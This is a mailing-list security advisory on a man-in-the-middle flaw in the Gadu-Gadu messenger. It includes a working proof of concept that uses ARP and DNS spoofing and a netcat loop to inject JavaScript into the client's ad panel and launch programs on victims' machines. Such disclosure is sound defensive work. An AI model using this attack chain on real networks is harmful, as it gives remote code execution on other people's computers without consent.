Vendor: Gadu-Gadu (http://gadu-gadu.pl) Vulnerable Version: All Vulnerability Type: MITM, Remote Code Execution Risk level: High Credit: Kacper Szczesniak <kacper3.14@gmail.com> Vulnerability Details: Gadu-Gadu is vulnerable to the Man-In-The-Middle attack allowing remote code execution on a victim host. JavaScript code is loaded from external HTTP location to display ads. If an attacker is able to take over HTTP request it's possible to inject JS code into WebKit User Interface. Internal communication mechanisms can be used to spawn new processes. No user interaction or contact list presence is needed as ads are loaded automatically. a trivial PoC to spawn notepads all over CoffeeHeaven/LAN: # echo 1 > /proc/sys/net/ipv4/ip_forward # arp -s GW_IP GW_MAC # arpspoof -i eth0 GW_IP # echo "YOURIP *.adocean.pl" > /tmp/x # dnsspoof -i eth0 -f /tmp/x # while [ 1 ] ; do echo -ne "HTTP/1.0 200 OK\r\nConnection: close\r\nContent-Length: 239\r\nContent-Type: text/html\r\n\r\nb=document.getElementsByTagName(\"body\").item(0);\r\nb.innerHTML='<a id=\"a\" href=\"c:/windows/notepad.exe\"></a>';\r\na=document.getElementById('a');\r\ne=document.createEvent('HTMLEvents');\r\ne.initEvent('click', true, true);\r\na.dispatchEvent(e);\r\n" | nc -l 80 ; done BTW last vulnerability was not really patched. Only message filter was introduced so it's still possible to take advantage of it using another MITM. kacper _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/